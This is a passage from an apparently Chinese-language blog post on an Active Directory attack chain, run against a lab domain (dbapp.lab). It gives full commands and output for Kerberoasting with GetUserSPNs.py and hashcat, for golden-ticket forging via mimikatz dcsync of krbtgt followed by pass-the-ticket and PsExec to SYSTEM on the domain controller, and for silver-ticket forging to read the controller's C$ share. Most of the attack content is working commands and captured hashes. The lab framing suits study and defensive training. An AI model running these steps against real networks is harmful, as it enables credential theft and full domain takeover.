<h3 id="Kerberoast&#xFF08;&#x8FDC;&#x7A0B;&#x83B7;&#x53D6;hash&#xFF09;"><a href="#Kerberoast&#xFF08;&#x8FDC;&#x7A0B;&#x83B7;&#x53D6;hash&#xFF09;" class="headerlink" title="Kerberoast&#xFF08;&#x8FDC;&#x7A0B;&#x83B7;&#x53D6;hash&#xFF09;"></a><strong>Kerberoast&#xFF08;&#x8FDC;&#x7A0B;&#x83B7;&#x53D6;hash&#xFF09;</strong></h3><p><strong>&#x5229;&#x7528;&#x524D;&#x63D0;&#xFF1A;&#x653B;&#x51FB;&#x8005;&#x80FD;&#x591F;&#x83B7;&#x53D6;&#x5230;&#x670D;&#x52A1;&#x7968;&#x636E;&#xFF08;&#x901A;&#x5E38;&#x5BF9;&#x6240;&#x6709;&#x57DF;&#x7528;&#x6237;&#x516C;&#x5F00;&#xFF09;&#xFF0C;&#x5E76;&#x4E14;&#x670D;&#x52A1;&#x8D26;&#x6237;&#x7684;&#x5BC6;&#x7801;&#x5F3A;&#x5EA6;&#x8F83;&#x4F4E;&#x3002;</strong></p>
<p>&#x4F7F;&#x7528;GetUserSPNs.py&#x8FDB;&#x884C;&#x653B;&#x51FB;&#x5E76;&#x7206;&#x7834;&#x5BC6;&#x7801;</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">&#x250C;&#x2500;&#x2500;<span class="hljs-params">(kali&#x327F;kali)</span>-[~<span class="hljs-string">/Desktop/orpheus-main</span>]<br>&#x2514;&#x2500;$ proxychains4 python3 GetUserSPNs.py -request -dc-ip 192.168.122.100 dbapp.lab/user2<br>[proxychains] config file found: <span class="hljs-string">/etc/proxychains4.conf</span><br>[proxychains] preloading <span class="hljs-string">/usr/lib/aarch64-linux-gnu/libproxychains.so.4</span><br>[proxychains] DLL init: proxychains-ng 4.17<br><span class="hljs-string">/home/kali/Desktop/orpheus-main/GetUserSPNs.py</span><span class="hljs-function">:36</span>: DeprecationWarning: pkg_resources is deprecated as an API. See https:<span class="hljs-string">//setuptools.pypa.io/en/latest/pkg_resources.html</span><br>  import pkg_resources<br>Impacket v0.11.0 - Copyright 2022 SecureAuth Corporation<br><br>Orpheus Edition - Written by Ben0xA<br><br><span class="hljs-comment">#&#x6B64;&#x5904;&#x5BC6;&#x7801;&#x8F93;&#x5165;&#x7528;&#x6237;&#x5BC6;&#x7801;</span><br>Password:<br>[proxychains] Strict chain  <span class="hljs-string">...</span>  192.168.205.160<span class="hljs-function">:7777</span>  <span class="hljs-string">...</span>  192.168.122.100<span class="hljs-function">:389</span>  <span class="hljs-string">...</span>  OK<br>ServicePrincipalName    Name   MemberOf  PasswordLastSet             LastLogon                   Delegation <br><span class="hljs-params">----------------------</span>  <span class="hljs-params">-----</span>  <span class="hljs-params">--------</span>  <span class="hljs-params">--------------------------</span>  <span class="hljs-params">--------------------------</span>  <span class="hljs-params">----------</span><br>VNC/win10pc1.dbapp.lab  user1            2022-12-10 10<span class="hljs-function">:29</span><span class="hljs-function">:59.172920</span>  2024-10-22 13<span class="hljs-function">:17</span><span class="hljs-function">:28.075823</span>       <br><br><br><br>[-] CCache file is not found. Skipping.<span class="hljs-string">..</span><br>[proxychains] Strict chain  <span class="hljs-string">...</span>  192.168.205.160<span class="hljs-function">:7777</span>  <span class="hljs-string">...</span>  192.168.122.100<span class="hljs-function">:88</span>  <span class="hljs-string">...</span>  OK<br>[proxychains] Strict chain  <span class="hljs-string">...</span>  192.168.205.160<span class="hljs-function">:7777</span>  <span class="hljs-string">...</span>  192.168.122.100<span class="hljs-function">:88</span>  <span class="hljs-string">...</span>  OK<br>Orpheus custom ticket options<br><br>Setting encryption to eType 23<br>Adding forwardable<br>Adding renewable<br>Adding canonicalize<br>Adding renewable_ok<br><br>[proxychains] Strict chain  <span class="hljs-string">...</span>  192.168.205.160<span class="hljs-function">:7777</span>  <span class="hljs-string">...</span>  192.168.122.100<span class="hljs-function">:88</span>  <span class="hljs-string">...</span>  OK<br>$krb5tgs$23$*user1$DBAPP.LAB$dbapp.lab/user1*$00322c2bec6d03724e5429a454db2746$940652ecd94a1e4fc3<span class="hljs-keyword">cd</span>68618b4e3bf6f45192adad4234094cb40a8d71c415f36e98900c7c5d054422da7d1c7aab9ce2dd82aaa365986e2e2c3e361bc7d7f7000ac556e030f87bf572c54e96db709639a918e404fa2cddd685f45<span class="hljs-keyword">cd</span>749ec4ea4d23ced7d765b43d255ce7c0884543e97e3f2a9583103e06903fc777<span class="hljs-keyword">cd</span>2b7ef99a8a532613eb1db5138d885d8802db390ea9ec36974c10e89f22087d3c71acfd8a953196e2bd700f1957ac56089a222b9712a7214d40f173410af56efe0f8e4bbb91ffb3a8038a3b28bec0b2dfbc3089780e3d7f13c2c026e6af87639613bd8d330fdf7d0d067eeba1eb7408c6504f9f7ba7f74aef4e373bf854c1592b6c474e49f1d67509756e1383eefbce9e92bf0f5b211af6366aa33927ee5d818f6be32f8656dc48db2a1c41779ca7288f637f098a6761527657df985d95c1328b8d5af6d31ab30c46076d96f0a10ea93ef0d4812a95962dccda0f1006ac0e28f9ea55<span class="hljs-keyword">cd</span>8d36eb7dd58e73867ab9480b442683fc24931c3b5789824fe804225d14a32e3c9c0c2583d77172e2ade7c7fb24ceb1b1446240e603764ca5c1524fe61f43e5b83d7f81710da5e667abd88a5a8733b61c4fcb66de4939bb1015fa145a4b84632b17031135b359fad2c72350df9a1764504c6423f171f9cc6987e642873a2ed84b1d919ebc05a8b63ddf8b6bccbbba0000ed685f7ab4c8a8b80fc88caedc8f87018b0190ec215d06747783993f2f6bbaca5afda6563aa98689436674fef51256cf0bf1f694f700846ab7cc7dbaf73f77dee23512da6ad8885add56035a3d79df12fed356f4c0e628c11e42385967a447db9eeb197f312d965bd07eacb9abe614c71ecfde0ea0f96e0880c5e3f0157780d5e8186c466db7e26178<span class="hljs-keyword">cd</span>604caf1adf7c4f5b6f1bf5a29f0ad96128d235cbc8f1256fcd2f48a9591c2d0d7063e6165d5f56208cb81d4d608a2b620e3c1d488c537718c7cecb5b8464e2f752414c1c3b47641c5a254c3c253e87ad73a2d964409ef7b2e7284c844ff1f1473242d156f2f3cb0b285e13d15d0427a9c3fac58e94975e732b84dca1bd3823e0c875fdc7ea397e45b9ab0f75e78b7986b4fc0bad130ebf2bf1ea243277b9f210d4a1c0961ae3ce08253f210048f4a5ad518f6d800734b9e4638225c5a6ce223841ae56aaee0c2cdc957509210f4a6a1c6198ea2e54d34726310d78cdcebe2e3aaf1538934e6443a320322<br><br></code></pre></td></tr></table></figure>

<p>&#x4F7F;&#x7528;hashcat&#x7834;&#x89E3;&#x5BC6;&#x7801;</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">hashcat -m <span class="hljs-number">13100</span> <span class="hljs-built_in">hash</span> <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<h2 id="4-&#x6301;&#x4E45;&#x5316;&#x4E0E;&#x9690;&#x853D;&#x540E;&#x95E8;"><a href="#4-&#x6301;&#x4E45;&#x5316;&#x4E0E;&#x9690;&#x853D;&#x540E;&#x95E8;" class="headerlink" title="4. &#x6301;&#x4E45;&#x5316;&#x4E0E;&#x9690;&#x853D;&#x540E;&#x95E8;"></a>4. &#x6301;&#x4E45;&#x5316;&#x4E0E;&#x9690;&#x853D;&#x540E;&#x95E8;</h2><h3 id="&#x9EC4;&#x91D1;&#x7968;&#x636E;"><a href="#&#x9EC4;&#x91D1;&#x7968;&#x636E;" class="headerlink" title="&#x9EC4;&#x91D1;&#x7968;&#x636E;"></a>&#x9EC4;&#x91D1;&#x7968;&#x636E;</h3><ul>
<li><strong>&#x76EE;&#x6807;</strong>&#xFF1A;&#x9EC4;&#x91D1;&#x7968;&#x636E;&#x7684;&#x76EE;&#x6807;&#x662F;&#x4F2A;&#x9020; <strong>TGT&#xFF08;Ticket Granting Ticket&#xFF09;</strong> &#xFF0C;&#x8FD9;&#x79CD;&#x7968;&#x636E;&#x7528;&#x6765;&#x8BF7;&#x6C42; Kerberos &#x670D;&#x52A1;&#x7968;&#x636E;&#xFF08;TGS&#xFF09;&#x8BBF;&#x95EE;&#x57DF;&#x5185;&#x7684;&#x4EFB;&#x4F55;&#x8D44;&#x6E90;&#x3002;</li>
<li><strong>&#x6743;&#x9650;&#x8303;&#x56F4;</strong>&#xFF1A;&#x9EC4;&#x91D1;&#x7968;&#x636E;&#x80FD;&#x591F;&#x8D4B;&#x4E88;&#x653B;&#x51FB;&#x8005;&#x5BF9;&#x6574;&#x4E2A;&#x57DF;&#x7684;&#x8BBF;&#x95EE;&#x6743;&#x9650;&#x3002;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x9EC4;&#x91D1;&#x7968;&#x636E;&#x8BBF;&#x95EE;&#x4EFB;&#x610F;&#x8D44;&#x6E90;&#xFF0C;&#x751A;&#x81F3;&#x53EF;&#x4EE5;&#x4F2A;&#x88C5;&#x6210;&#x57DF;&#x7BA1;&#x7406;&#x5458;&#x3002;</li>
<li><strong>&#x524D;&#x63D0;&#x6761;&#x4EF6;</strong>&#xFF1A;&#x4E3A;&#x4E86;&#x751F;&#x6210;&#x9EC4;&#x91D1;&#x7968;&#x636E;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x9700;&#x8981;&#x83B7;&#x53D6; <strong>KRBTGT</strong> &#x8D26;&#x6237;&#x7684; NTLM &#x54C8;&#x5E0C;&#x3002;KRBTGT &#x662F;&#x8D1F;&#x8D23;&#x52A0;&#x5BC6;&#x548C;&#x89E3;&#x5BC6; TGT &#x7684;&#x670D;&#x52A1;&#x8D26;&#x6237;&#xFF0C;&#x56E0;&#x6B64;&#x62E5;&#x6709;&#x5176;&#x54C8;&#x5E0C;&#x610F;&#x5473;&#x7740;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x4F2A;&#x9020;&#x4EFB;&#x4F55; Kerberos TGT&#x3002;</li>
<li><strong>&#x4F5C;&#x7528;</strong>&#xFF1A;&#x4E00;&#x65E6;&#x751F;&#x6210;&#x9EC4;&#x91D1;&#x7968;&#x636E;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x5728;&#x57DF;&#x5185;&#x7684;&#x4EFB;&#x4F55;&#x5730;&#x65B9;&#x8FDB;&#x884C;&#x6A2A;&#x5411;&#x79FB;&#x52A8;&#xFF0C;&#x957F;&#x671F;&#x6301;&#x6709;&#x8BE5;&#x7968;&#x636E;&#x610F;&#x5473;&#x7740;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x5728;&#x5F88;&#x957F;&#x65F6;&#x95F4;&#x5185;&#x63A7;&#x5236;&#x6574;&#x4E2A;&#x57DF;&#xFF0C;&#x76F4;&#x5230; KRBTGT &#x8D26;&#x6237;&#x5BC6;&#x7801;&#x88AB;&#x66F4;&#x6539;&#x3002;</li>
<li><strong>&#x5E94;&#x7528;&#x573A;&#x666F;</strong>&#xFF1A;&#x7528;&#x4E8E;<strong>&#x57DF;&#x5185;&#x7684;&#x5B8C;&#x5168;&#x63A7;&#x5236;</strong>&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x8BBF;&#x95EE;&#x57DF;&#x4E2D;&#x6240;&#x6709;&#x8D44;&#x6E90;&#x3002;</li>
</ul>
<p>&#x5728;DC&#x5185;&#x751F;&#x6210;&#x4E00;&#x4E2A;&#x4F2A;&#x9020;&#x7684;&#x9EC4;&#x91D1;&#x7968;&#x636E;1.kirbi</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">whoami</span> /user<br><br><span class="hljs-comment">#&#x8FDB;&#x5165;mimikatz</span><br>mimikatz.exe<br>lsadump::dcsync /domain:dbapp.lab /user:krbtgt<br><br><span class="hljs-comment">#&#x4F2A;&#x9020;&#x9EC4;&#x91D1;&#x7968;&#x636E;</span><br>kerberos::golden /user:&#x7528;&#x6237;&#x540D; /domain:&#x57DF;&#x540D; /sid:SID /krbtgt:krbtgthash /ticket:&#x9EC4;&#x91D1;&#x7968;&#x636E;&#x540D;&#x79F0;<br>&#x4F8B;&#xFF1A;<br>kerberos::golden /user:Administrator /domain:dbapp.lab /sid:S-1-5-21-2476688485-4256841910-2155116890 /krbtgt:dbd96281f999cc0a3fbe58dc217ea11d /ticket:1.kirbi<br></code></pre></td></tr></table></figure>

<p>&#x5C06;&#x4F2A;&#x9020;&#x7684;&#x9EC4;&#x91D1;&#x7968;&#x636E;&#x62F7;&#x8D1D;&#x5230;&#x5176;&#x4ED6;&#x4E3B;&#x673A;&#x5185;&#x3002;</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-comment">#&#x8FDB;&#x5165;mimikatz&#x5BFC;&#x5165;&#x7968;&#x636E;</span><br><span class="hljs-attribute">kerberos</span>::ptt <span class="hljs-number">1</span>.kirbi<br><br><span class="hljs-comment">#&#x53EF;&#x4EE5;&#x76F4;&#x63A5;PsExec&#x8FDE;&#x63A5;DC</span><br><span class="hljs-attribute">PsExec64</span>.exe \\dc -s cmd.exe<br></code></pre></td></tr></table></figure>

<p>&#x653B;&#x51FB;&#x6548;&#x679C;</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><code class="hljs clean">C:\Users\user\Desktop&gt;mimikatz.exe<br><br>  .#####.   mimikatz <span class="hljs-number">2.2</span><span class="hljs-number">.0</span> (x64) #<span class="hljs-number">19041</span> Sep <span class="hljs-number">19</span> <span class="hljs-number">2022</span> <span class="hljs-number">17</span>:<span class="hljs-number">44</span>:<span class="hljs-number">08</span><br> .## ^ ##.  <span class="hljs-string">&quot;A La Vie, A L&apos;Amour&quot;</span> - (oe.eo)<br> ## / \ ##  <span class="hljs-comment">/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span><br><span class="hljs-comment"> ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz</span><br><span class="hljs-comment"> &apos;## v ##&apos;       Vincent LE TOUX             ( vincent.letoux@gmail.com )</span><br><span class="hljs-comment">  &apos;#####&apos;        &gt; https://pingcastle.com / https://mysmartlogon.com ***/</span><br><br>mimikatz # kerberos::ptt <span class="hljs-number">1.</span>kirbi<br><br>* File: <span class="hljs-string">&apos;1.kirbi&apos;</span>: OK<br><br>mimikatz # exit<br>Bye!<br><br>C:\Users\user\Desktop&gt;PsExec64.exe \\dc -s cmd.exe<br><br>PsExec v2<span class="hljs-number">.43</span> - Execute processes remotely<br>Copyright (C) <span class="hljs-number">2001</span><span class="hljs-number">-2023</span> Mark Russinovich<br>Sysinternals - www.sysinternals.com<br><br><br>Microsoft Windows [&#x7248;&#x672C; <span class="hljs-number">6.1</span><span class="hljs-number">.7601</span>]<br>&#x7248;&#x6743;&#x6240;&#x6709; (c) <span class="hljs-number">2009</span> Microsoft Corporation&#x3002;&#x4FDD;&#x7559;&#x6240;&#x6709;&#x6743;&#x5229;&#x3002;<br><br>C:\Windows\system32&gt;whoami /user<br><br>&#x7528;&#x6237;&#x4FE1;&#x606F;<br>----------------<br><br>&#x7528;&#x6237;&#x540D;              SID<br>=================== ========<br>nt authority\<span class="hljs-keyword">system</span> S<span class="hljs-number">-1</span><span class="hljs-number">-5</span><span class="hljs-number">-18</span><br></code></pre></td></tr></table></figure>

<h3 id="&#x767D;&#x94F6;&#x7968;&#x636E;"><a href="#&#x767D;&#x94F6;&#x7968;&#x636E;" class="headerlink" title="&#x767D;&#x94F6;&#x7968;&#x636E;"></a>&#x767D;&#x94F6;&#x7968;&#x636E;</h3><ul>
<li><strong>&#x76EE;&#x6807;</strong>&#xFF1A;&#x767D;&#x94F6;&#x7968;&#x636E;&#x7684;&#x76EE;&#x6807;&#x662F;&#x4F2A;&#x9020; <strong>TGS&#xFF08;Ticket Granting Service Ticket&#xFF09;</strong> &#xFF0C;&#x8FD9;&#x79CD;&#x7968;&#x636E;&#x662F;&#x7528;&#x4E8E;&#x8BBF;&#x95EE;&#x7279;&#x5B9A;&#x670D;&#x52A1;&#x7684;&#x6388;&#x6743;&#x51ED;&#x636E;&#x3002;</li>
<li><strong>&#x6743;&#x9650;&#x8303;&#x56F4;</strong>&#xFF1A;&#x767D;&#x94F6;&#x7968;&#x636E;&#x53EA;&#x80FD;&#x8D4B;&#x4E88;&#x653B;&#x51FB;&#x8005;&#x5BF9;&#x7279;&#x5B9A;&#x670D;&#x52A1;&#x7684;&#x8BBF;&#x95EE;&#x6743;&#x9650;&#x3002;&#x4F8B;&#x5982;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x4F2A;&#x9020;&#x4E00;&#x4E2A;&#x7528;&#x4E8E;&#x8BBF;&#x95EE;&#x6587;&#x4EF6;&#x670D;&#x52A1;&#x5668;&#xFF08;CIFS&#xFF09;&#x3001;SQL &#x670D;&#x52A1;&#x5668;&#x6216; HTTP &#x670D;&#x52A1;&#x7684; TGS&#x3002;</li>
<li><strong>&#x524D;&#x63D0;&#x6761;&#x4EF6;</strong>&#xFF1A;&#x767D;&#x94F6;&#x7968;&#x636E;&#x7684;&#x751F;&#x6210;&#x53EA;&#x9700;&#x8981;&#x83B7;&#x53D6;<strong>&#x670D;&#x52A1;&#x8D26;&#x6237;</strong>&#x7684; NTLM &#x54C8;&#x5E0C;&#xFF08;&#x6BD4;&#x5982;&#x7528;&#x4E8E;&#x67D0;&#x4E2A;&#x7279;&#x5B9A;&#x670D;&#x52A1;&#x7684;&#x8BA1;&#x7B97;&#x673A;&#x8D26;&#x6237;&#x54C8;&#x5E0C;&#xFF09;&#xFF0C;&#x4E0D;&#x9700;&#x8981; KRBTGT &#x7684;&#x54C8;&#x5E0C;&#x3002;&#x56E0;&#x6B64;&#x76F8;&#x5BF9;&#x9EC4;&#x91D1;&#x7968;&#x636E;&#xFF0C;&#x767D;&#x94F6;&#x7968;&#x636E;&#x7684;&#x751F;&#x6210;&#x66F4;&#x52A0;&#x7B80;&#x5355;&#x3002;</li>
<li><strong>&#x4F5C;&#x7528;</strong>&#xFF1A;&#x767D;&#x94F6;&#x7968;&#x636E;&#x7684;&#x653B;&#x51FB;&#x8303;&#x56F4;&#x6709;&#x9650;&#xFF0C;&#x53EA;&#x80FD;&#x8BBF;&#x95EE;&#x4E0E;&#x4F2A;&#x9020;&#x7684;&#x670D;&#x52A1;&#x7968;&#x636E;&#x76F8;&#x5173;&#x7684;&#x7279;&#x5B9A;&#x670D;&#x52A1;&#x8D44;&#x6E90;&#x3002;&#x8FD9;&#x610F;&#x5473;&#x7740;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x8BBF;&#x95EE;&#x7279;&#x5B9A;&#x670D;&#x52A1;&#xFF0C;&#x800C;&#x4E0D;&#x9700;&#x8981;&#x4E0E;&#x57DF;&#x63A7;&#x5236;&#x5668;&#x901A;&#x4FE1;&#x3002;</li>
<li><strong>&#x5E94;&#x7528;&#x573A;&#x666F;</strong>&#xFF1A;&#x7528;&#x4E8E;<strong>&#x7279;&#x5B9A;&#x670D;&#x52A1;&#x7684;&#x653B;&#x51FB;</strong>&#xFF0C;&#x4E0D;&#x9700;&#x8981;&#x5BF9;&#x6574;&#x4E2A;&#x57DF;&#x8FDB;&#x884C;&#x5B8C;&#x5168;&#x63A7;&#x5236;&#x3002;</li>
</ul>
<p>&#x5728;DC&#x5185;&#x751F;&#x6210;&#x4E00;&#x4E2A;&#x4F2A;&#x9020;&#x7684;&#x767D;&#x94F6;&#x7968;&#x636E;1.kirbi</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arduino">mimikatz.exe<br>privilege::debug<br>sekurlsa::logonpasswords<br></code></pre></td></tr></table></figure>

<p>&#x4F2A;&#x9020;&#x767D;&#x94F6;&#x7968;&#x636E;sliver.kribi</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">kerberos::golden /domain:&#x57DF;&#x540D; /sid:SID /target:dc&#x57DF;&#x540D; /service:&#x670D;&#x52A1;&#x540D;&#x79F0; /rc4:NTLMhash /user:&#x7528;&#x6237;&#x540D; /ticket:&#x767D;&#x94F6;&#x7968;&#x636E;&#x540D;<br>&#x4F8B;&#xFF1A;<br>kerberos::golden /domain:dbapp.lab /sid:S-1-5-21-2476688485-4256841910-2155116890 /target:dc.dbapp.lab /service:cifs /rc4:8ab533df17a3c8223cd9f185b312c7e4 /user:user /ticket:sliver.kirbi<br></code></pre></td></tr></table></figure>

<p>&#x4F7F;&#x7528;&#x5176;&#x4ED6;&#x4E3B;&#x673A;mimikatz&#x5BFC;&#x5165;&#x767D;&#x94F6;&#x7968;&#x636E;&#xFF0C;&#x5E76;&#x5C1D;&#x8BD5;&#x8BBF;&#x95EE;&#x57DF;&#x63A7;C&#x76D8;&#x6570;&#x636E;</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs avrasm">mimikatz.exe<br><br><span class="hljs-symbol">kerberos:</span>:purge<br><span class="hljs-meta">#&#x8F6C;&#x50A8;&#x5F53;&#x524D;&#x7CFB;&#x7EDF;&#x5185;&#x5B58;&#x4E2D;&#x7684;&#x51ED;&#x8BC1;&#xFF0C;&#x5305;&#x62EC; NTLM &#x54C8;&#x5E0C;&#x3002;</span><br><span class="hljs-symbol">kerberos:</span>:list<br><span class="hljs-meta">#&#x751F;&#x6210;&#x767D;&#x94F6;&#x7968;&#x636E;</span><br><span class="hljs-symbol">kerberos:</span>:ptt sliver.kirbi<br><br>dir \\dc.dbapp.lab\c$<br></code></pre></td></tr></table></figure>

<p>&#x653B;&#x51FB;&#x6548;&#x679C;</p>
<figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs nix">C:\Users\user\Desktop<span class="hljs-operator">&gt;</span>mimikatz.exe<br><br>  .<span class="hljs-comment">#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08</span><br> .<span class="hljs-comment">## ^ ##.  &quot;A La Vie, A L&apos;Amour&quot; - (oe.eo)</span><br> <span class="hljs-comment">## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span><br> <span class="hljs-comment">## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz</span><br> &apos;<span class="hljs-comment">## v ##&apos;       Vincent LE TOUX             ( vincent.letoux@gmail.com )</span><br>  &apos;<span class="hljs-comment">#####&apos;        &gt; https://pingcastle.com / https://mysmartlogon.com ***/</span><br><br>mimikatz <span class="hljs-comment"># kerberos::purge</span><br>Ticket(s) purge for current session is OK<br><br>mimikatz <span class="hljs-comment"># kerberos::list</span><br><br>mimikatz <span class="hljs-comment"># kerberos::ptt sliver.kirbi</span><br><br><span class="hljs-operator">*</span> <span class="hljs-params">File:</span> &apos;sliver.<span class="hljs-params">kirbi&apos;:</span> OK<br><br>mimikatz <span class="hljs-comment"># exit</span><br>Bye<span class="hljs-operator">!</span><br><br>C:\Users\user\Desktop<span class="hljs-operator">&gt;</span>dir \\dc.dbapp.lab\c$<br> &#x9A71;&#x52A8;&#x5668; \\dc.dbapp.lab\c$ &#x4E2D;&#x7684;&#x5377;&#x6CA1;&#x6709;&#x6807;&#x7B7E;&#x3002;<br> &#x5377;&#x7684;&#x5E8F;&#x5217;&#x53F7;&#x662F; <span class="hljs-number">2</span>CC5-<span class="hljs-number">4633</span><br><br> \\dc.dbapp.lab\c$ &#x7684;&#x76EE;&#x5F55;<br><br><span class="hljs-number">2024</span><span class="hljs-symbol">/10/23</span>  <span class="hljs-number">15</span>:<span class="hljs-number">16</span>            <span class="hljs-number">37</span>,<span class="hljs-number">140</span> .opennebula-context.out<br><span class="hljs-number">2024</span><span class="hljs-symbol">/10/23</span>  <span class="hljs-number">15</span>:<span class="hljs-number">16</span>               <span class="hljs-number">112</span> .opennebula-startscript.ps1<br><span class="hljs-number">2009</span><span class="hljs-symbol">/07/14</span>  <span class="hljs-number">11</span>:<span class="hljs-number">20</span>    <span class="hljs-symbol">&lt;DIR&gt;</span>          PerfLogs<br><span class="hljs-number">2022</span><span class="hljs-symbol">/10/09</span>  <span class="hljs-number">10</span>:<span class="hljs-number">10</span>    <span class="hljs-symbol">&lt;DIR&gt;</span>          Program Files<br><span class="hljs-number">2022</span><span class="hljs-symbol">/10/09</span>  <span class="hljs-number">10</span>:<span class="hljs-number">10</span>    <span class="hljs-symbol">&lt;DIR&gt;</span>          Program Files (x86)<br><span class="hljs-number">2017</span><span class="hljs-symbol">/08/19</span>  <span class="hljs-number">00</span>:<span class="hljs-number">34</span>    <span class="hljs-symbol">&lt;DIR&gt;</span>          Users<br><span class="hljs-number">2024</span><span class="hljs-symbol">/10/23</span>  <span class="hljs-number">15</span>:<span class="hljs-number">16</span>    <span class="hljs-symbol">&lt;DIR&gt;</span>          Windows<br>               <span class="hljs-number">2</span> &#x4E2A;&#x6587;&#x4EF6;         <span class="hljs-number">37</span>,<span class="hljs-number">252</span> &#x5B57;&#x8282;<br>               <span class="hljs-number">5</span> &#x4E2A;&#x76EE;&#x5F55; <span class="hljs-number">11</span>,<span class="hljs-number">108</span>,<span class="hljs-number">151</span>,<span class="hljs-number">296</span> &#x53EF;&#x7528;&#x5B57;&#x8282;<br></code></pre></td></tr></table></figure>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%AE%89%E5%85%A8/" class="category-chain-item">安全</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" class="print-no-link">#内网渗透</a>
      
        <a href="/tags/%E5%9F%9F%E6%B8%97%E9%80%8F/" class="print-no-link">#域渗透</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>域渗透攻击链</div>
      <div>http://example.com/2025/05/06/域渗透攻击链/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年5月6日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
